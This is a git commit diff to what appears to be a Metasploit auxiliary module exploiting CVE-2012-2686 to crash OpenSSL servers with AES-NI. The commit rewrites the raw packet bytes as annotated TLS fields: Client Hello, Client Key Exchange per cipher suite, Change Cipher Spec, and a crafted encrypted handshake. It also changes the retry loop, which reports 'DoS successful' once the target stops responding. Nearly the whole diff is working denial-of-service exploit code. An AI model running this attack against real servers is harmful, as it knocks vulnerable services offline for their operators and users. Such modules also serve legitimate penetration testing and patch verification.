Beautified OpenSSL-AESNI module

ettisan · ettisan · commit 867875b4454d · 2013-03-04T19:09:50.000+01:00
Modifed the CVE-2012-2686 module to follow suggestions by @jvazquez-r7: * Added description for all fields in the SSL packets * MAX_TRIES now required * use get_once instead of timeout
diff --git a/modules/auxiliary/dos/ssl/openssl_aesni.rb b/modules/auxiliary/dos/ssl/openssl_aesni.rb
@@ -17,8 +17,8 @@ def initialize(info = {})
 			'Author'	=> [
 						'Wolfgang Ettlinger <wolfgang.ettlinger[at]gmail.com>'
 						],
-			'License'        => BSD_LICENSE,
-			'References'     =>
+			'License'		=> BSD_LICENSE,
+			'References'	=>
 				[
 					[ 'CVE', '2012-2686'],
 					[ 'URL', 'https://www.openssl.org/news/secadv_20130205.txt']
@@ -28,74 +28,105 @@ def initialize(info = {})
 		register_options(
 			[
 				Opt::RPORT(443),
-				OptInt.new('MAX_TRIES', [false,  "Maximum number of tries", 300])
+				OptInt.new('MAX_TRIES', [true,  "Maximum number of tries", 300])
 			], self.class)
 	end
 
 	def run
 		# Client Hello
-		p1 =
-			"\x16\x03\x01\x00\x7e\x01\x00\x00\x7a\x03\x02\x50\xeb\xf2\x4a\xaf"<<
-			"\x74\xf5\xe3\x55\x6a\xae\xcf\x88\x36\x7c\xd9\xe5\x1b\xcc\x09\xee"<<
-			"\x6f\x42\x30\x3b\x49\x55\xf8\xaa\x11\x32\xeb\x00\x00\x08\xc0\x13"<<
-			"\x00\x39\x00\x35\x00\xff\x01\x00\x00\x49\x00\x0b\x00\x04\x03\x00"<<
-			"\x01\x02\x00\x0a\x00\x34\x00\x32\x00\x0e\x00\x0d\x00\x19\x00\x0b"<<
-			"\x00\x0c\x00\x18\x00\x09\x00\x0a\x00\x16\x00\x17\x00\x08\x00\x06"<<
-			"\x00\x07\x00\x14\x00\x15\x00\x04\x00\x05\x00\x12\x00\x13\x00\x01"<<
-			"\x00\x02\x00\x03\x00\x0f\x00\x10\x00\x11\x00\x23\x00\x00\x00\x0f"<<
-			"\x00\x01\x01"
+		p1 =  "\x16"					# Content Type: Handshake
+		p1 << "\x03\x01"				# Version: TLS 1.0
+		p1 << "\x00\x7e"				# Length: 126
+		p1 << "\x01"					# Handshake Type: Client Hello
+		p1 << "\x00\x00\x7a"			# Length: 122
+		p1 << "\x03\x02"				# Version: TLS 1.1
+		p1 << ("A" * 32)				# Random
+		p1 << "\x00"					# Session ID Length: 0
+		p1 << "\x00\x08"				# Cypher Suites Length: 6
+		p1 << "\xc0\x13"				# - ECDHE-RSA-AES128-SHA
+		p1 << "\x00\x39"				# - DHE-RSA-AES256-SHA
+		p1 << "\x00\x35"				# - AES256-SHA
+		p1 << "\x00\xff"				# - EMPTY_RENEGOTIATION_INFO_SCSV
+		p1 << "\x01"					# Compression Methods Length: 1
+		p1 << "\x00"					# - NULL-Compression
+		p1 << "\x00\x49"				# Extensions Length: 73
+		p1 << "\x00\x0b"				# - Extension: ec_point_formats
+		p1 << "\x00\x04"				#   Length: 4
+		p1 << "\x03"					#   EC Points Format Length: 3
+		p1 << "\x00"					#   - uncompressed
+		p1 << "\x01"					#   - ansiX962_compressed_prime
+		p1 << "\x02"					#   - ansiX962_compressed_char2
+		p1 << "\x00\x0a"				# - Extension: elliptic_curves
+		p1 << "\x00\x34"				#   Length: 52
+		p1 << "\x00\x32"				#   Elliptic Curves Length: 50
+										#   25 Elliptic curves:
+		p1 << "\x00\x0e\x00\x0d\x00\x19\x00\x0b\x00\x0c\x00\x18\x00\x09\x00\x0a"
+		p1 << "\x00\x16\x00\x17\x00\x08\x00\x06\x00\x07\x00\x14\x00\x15\x00\x04"
+		p1 << "\x00\x05\x00\x12\x00\x13\x00\x01\x00\x02\x00\x03\x00\x0f\x00\x10"
+		p1 << "\x00\x11"
+
+		p1 << "\x00\x23"				# - Extension: SessionTicket TLS
+		p1 << "\x00\x00"				#   Length: 0
+		p1 << "\x00\x0f"				# - Extension: Heartbeat
+		p1 << "\x00\x01"				#   Length: 1
+		p1 << "\x01"					#   Peer allowed to send requests
+
+
+		# Change Cipher Spec Message
+		p2_cssm =  "\x14"				# Content Type: Change Cipher Spec
+		p2_cssm << "\x03\x02"			# Version: TLS 1.1
+		p2_cssm << "\x00\x01"			# Length: 1
+		p2_cssm << "\x01"				# Change Cipher Spec Message
+
+
+		# Encrypted Handshake Message
+		p2_ehm =  "\x16"				# Content Type: Handshake
+		p2_ehm << "\x03\x02"			# Version: TLS 1.1
+		p2_ehm << "\x00\x40"			# Length: 64
+		p2_ehm << ("A" * 64)			# Encrypted Message
+
 
 		# Client Key Exchange, Change Cipher Spec, Encrypted Handshake
 		# AES256-SHA
-		p2_aes_sha =
-			"\x16\x03\x02\x01\x06\x10\x00\x01\x02\x01\x00\x4c\xee\x18\xe2\xec"<<
-			"\xa9\x9d\xd7\x10\xd0\xff\x6f\xa8\x10\xf5\x9c\xa0\x91\x38\x93\x93"<<
-			"\xaa\x71\x07\x69\xb6\x22\x81\x2d\xcd\xe0\x8f\x95\xf2\x9b\xaa\x49"<<
-			"\x18\x15\x53\xc3\x34\x15\x81\xab\x20\x72\x16\x5b\xf2\xca\x13\x9e"<<
-			"\x11\x6e\x3c\xf5\x71\x7c\x19\xf4\x7d\x35\x71\x25\x6e\xbe\xee\xdf"<<
-			"\x1d\x55\xc9\x38\xac\xbb\x88\xab\xd0\x18\x7d\x5f\xaa\x3c\x91\x2f"<<
-			"\xd2\x64\x7c\x15\x91\xa6\xe7\xb7\x0c\x01\xb3\xc7\x37\xc1\x3a\xb2"<<
-			"\xde\x59\x6e\x8f\x7a\xde\x22\x59\x6c\xb7\x91\x21\x8f\xff\x56\x2c"<<
-			"\x5f\xfb\x54\x7f\xd1\x1a\x00\x0e\x02\xb2\x4e\x62\xfd\xe2\xc0\x8f"<<
-			"\x56\x52\x8a\x4c\x44\x01\x5f\x21\xf9\xd5\xb3\xeb\xab\x39\xcf\x4e"<<
-			"\xed\x78\xad\xea\xc7\x43\x80\x3f\xf2\x41\xbe\x5c\x83\xa5\x54\x6f"<<
-			"\x3c\xfb\x15\xed\x3c\x83\xf0\x3b\xd2\x7c\x5d\xf6\x82\xcb\x82\xb6"<<
-			"\x6a\x8e\x94\xf9\x22\x5a\x17\x20\x82\x21\x4e\x83\x01\x81\x06\x9e"<<
-			"\x21\xba\x16\xa4\xda\xcd\x8e\x1c\x8c\xe7\x19\x96\x2a\xec\x90\x6a"<<
-			"\x16\xac\x12\x68\xbd\xf7\x4b\x6c\x3c\x91\x8b\xe7\x34\x03\x91\x65"<<
-			"\x61\x57\xbc\x3a\x66\x3b\x7b\xb1\x57\xcd\x19\x5c\x4a\x69\x43\xb2"<<
-			"\x67\xaf\x38\x5c\x1a\x7e\x80\x78\x90\x25\xb8\x14\x03\x02\x00\x01"<<
-			"\x01\x16\x03\x02\x00\x40\x7d\xf4\x2c\x8c\x64\x74\xa5\x98\x02\x41"<<
-			"\xac\x97\xfd\x53\x15\x4c\xbf\x16\x08\x26\xe0\x6c\x22\x70\x5f\x36"<<
-			"\x75\x75\x96\xf9\x6b\x9f\xb4\xc3\x38\xa7\x14\xac\x21\x89\xec\xd6"<<
-			"\x37\x28\xf3\x0d\xdf\xb3\x1b\xac\x96\xf3\x16\x5c\xc3\x6b\x71\x1c"<<
-			"\xdb\x0d\x04\x96\x21\xd2"
+		p2_aes_sha =  "\x16"			# Content Type: Handshake
+		p2_aes_sha << "\x03\x02"		# Version: TLS 1.1
+		p2_aes_sha << "\x01\x06"		# Length: 262
+		p2_aes_sha << "\x10"			# Handshake Type: Client Key Exchange
+		p2_aes_sha << "\x00\x01\x02"	# Length: 258
+		p2_aes_sha << "\x01\x00"		# Encrypted PreMaster Length: 256
+		p2_aes_sha << ("\x00" * 256)	# Encrypted PresMaster (irrelevant)
+		p2_aes_sha << p2_cssm 			# Change Cipher Spec Message
+		p2_aes_sha << p2_ehm			# Encrypted Handshake Message
+
 
 		# DHE-RSA-AES256-SHA
-		p2_dhe_rsa_aes256_sha =
-			"\x16\x03\x02\x00\x46\x10\x00\x00\x42\x00\x40\x43\xaf\x48\x16\x8d"<<
-			"\x17\xb9\xb0\xb6\xbc\x68\xab\x99\xf9\x30\xc9\xb1\xa2\x3b\x4f\x79"<<
-			"\xaa\x76\x5c\x0d\x61\xa0\x19\x55\x11\x20\xe8\xbb\xab\x69\xf3\xeb"<<
-			"\xff\x81\x1d\x16\x0d\x03\xaf\xb9\x70\xae\x72\x5c\xd8\xc7\x28\x2c"<<
-			"\xac\xd5\x84\x2c\xaf\x2a\x57\x46\x71\xca\x73\x14\x03\x02\x00\x01"<<
-			"\x01\x16\x03\x02\x00\x40\xff\x62\x0f\x7a\xb2\x79\xfe\x78\xce\xb9"<<
-			"\xde\xc4\xef\x66\x2f\xed\x1a\x37\xfe\x47\xdd\xde\x9c\xe0\x42\xbc"<<
-			"\x93\x20\x65\x05\xd3\x50\x14\x1c\x6c\xb1\x7a\x3a\x7d\x91\x92\xbb"<<
-			"\x9d\x42\x78\xbf\xe4\x08\xa0\xfd\x9c\xeb\x24\x29\x3b\xed\xc8\x54"<<
-			"\x3d\xd3\xa2\xff\xb0\x8b"
+		p2_dhe =  "\x16"				# Content Type: Handshake
+		p2_dhe << "\x03\x02"			# Version: TLS 1.1
+		p2_dhe << "\x00\x46"			# Length: 70
+		p2_dhe << "\x10"				# Handshake Type: Client Key Exchange
+		p2_dhe << "\x00\x00\x42"		# Length: 66
+		p2_dhe << "\x00\x40"			# DH Pubkey Length: 64
+		p2_dhe << ("A" * 64)			# DH Pubkey
+		p2_dhe << p2_cssm				# Change Cipher Spec Message
+		p2_dhe << p2_ehm				# Encrypted Handshake Message
+
 
 		# ECDHE-RSA-AES128-SHA
-		p2_ecdhe_rsa_aes128_sha =
-			"\x16\x03\x02\x00\x46\x10\x00\x00\x42\x41\x04\x2f\x22\xf4\x06\x3f"<<
-			"\xa1\xf7\x3d\xb6\x55\xbc\x68\x65\x57\xd8\x03\xe5\xaa\x36\xeb\x0f"<<
-			"\x52\x5a\xaf\xd0\x9f\xf8\xc7\xfe\x09\x69\x5b\x38\x95\x58\xb6\x0d"<<
-			"\x27\x53\xe9\x63\xcb\x96\xb3\x54\x47\xa6\xb2\xe6\x8b\x2a\xd9\x03"<<
-			"\xb4\x85\x46\xd9\x1c\x5f\xd1\xf7\x7b\x73\x40\x14\x03\x02\x00\x01"<<
-			"\x01\x16\x03\x02\x00\x40\x8c\xc6\x4d\xdc\x42\x03\x64\xa3\xc0\xf4"<<
-			"\x94\xda\xa4\x12\x68\x78\xfd\x5b\x44\xaf\xa3\x91\x63\x75\x26\x93"<<
-			"\x14\xad\x86\xa7\x4f\x5a\x2e\xcb\x13\x17\xb7\xdf\x67\x64\x1b\x10"<<
-			"\xc3\x9f\x68\xaf\x92\x38\xbf\x67\xc6\x18\x5b\x78\xc9\x99\xc3\x70"<<
-			"\x89\x09\xe2\x3f\x3e\x1f"
+		p2_ecdhe =  "\x16"				# Content Type: Handshake
+		p2_ecdhe << "\x03\x02"			# Version: TLS 1.1
+		p2_ecdhe << "\x00\x46"			# Length: 70
+		p2_ecdhe << "\x10"				# Handshake Type: Client Key Exchange
+		p2_ecdhe << "\x00\x00\x42"		# Length: 66
+		p2_ecdhe << "\x41"				# EC DH Pubkey Length: 65
+										# EC DH Pubkey:
+		p2_ecdhe << "\x04\x2f\x22\xf4\x06\x3f\xa1\xf7\x3d\xb6\x55\xbc\x68\x65\x57\xd8"
+		p2_ecdhe << "\x03\xe5\xaa\x36\xeb\x0f\x52\x5a\xaf\xd0\x9f\xf8\xc7\xfe\x09\x69"
+		p2_ecdhe << "\x5b\x38\x95\x58\xb6\x0d\x27\x53\xe9\x63\xcb\x96\xb3\x54\x47\xa6"
+		p2_ecdhe << "\xb2\xe6\x8b\x2a\xd9\x03\xb4\x85\x46\xd9\x1c\x5f\xd1\xf7\x7b\x73"
+		p2_ecdhe << "\x40"
+		p2_ecdhe << p2_cssm				# Change Cipher Spec Message
+		p2_ecdhe << p2_ehm				# Encrypted Handshake Message
+
 
 		maxtries = datastore['MAX_TRIES']
 
@@ -112,9 +143,9 @@ def run
 			cs = get_cipher_suite(resp)
 
 			if cs == 0xc013 # ECDHE-RSA-AES128-SHA
-				p2 = p2_ecdhe_rsa_aes128_sha
+				p2 = p2_ecdhe
 			elsif cs == 0x0039 # DHE-RSA-AES256-SHA
-				p2 = p2_dhe_rsa_aes256_sha
+				p2 = p2_dhe
 			elsif cs == 0x0035 # AES256-SHA
 				p2 = p2_aes_sha
 			else
@@ -126,17 +157,16 @@ def run
 
 			alert = nil
 
-			timeout(2) do
-				alert = sock.recv(4096)
-			end
-
-			disconnect
-
-			if alert == ''
+			begin
+				alert = sock.get_once(-1, 2)
+			rescue EOFError
 				print_status("DoS successful. process on #{rhost} did not respond.")
 				success = true
 				break
 			end
+
+			disconnect
+
 		end
 
 		if success == false
@@ -157,7 +187,7 @@ def get_cipher_suite(resp)
 			len = (resp[offset+3, 2]).unpack("n")[0]
 			hstype = (resp[offset+5, 1]).unpack("C")[0]
 
-			if hstype == 2
+			if hstype == 2 # Server Hello
 				return (resp[offset+44, 2]).unpack("n")[0]
 			end
 
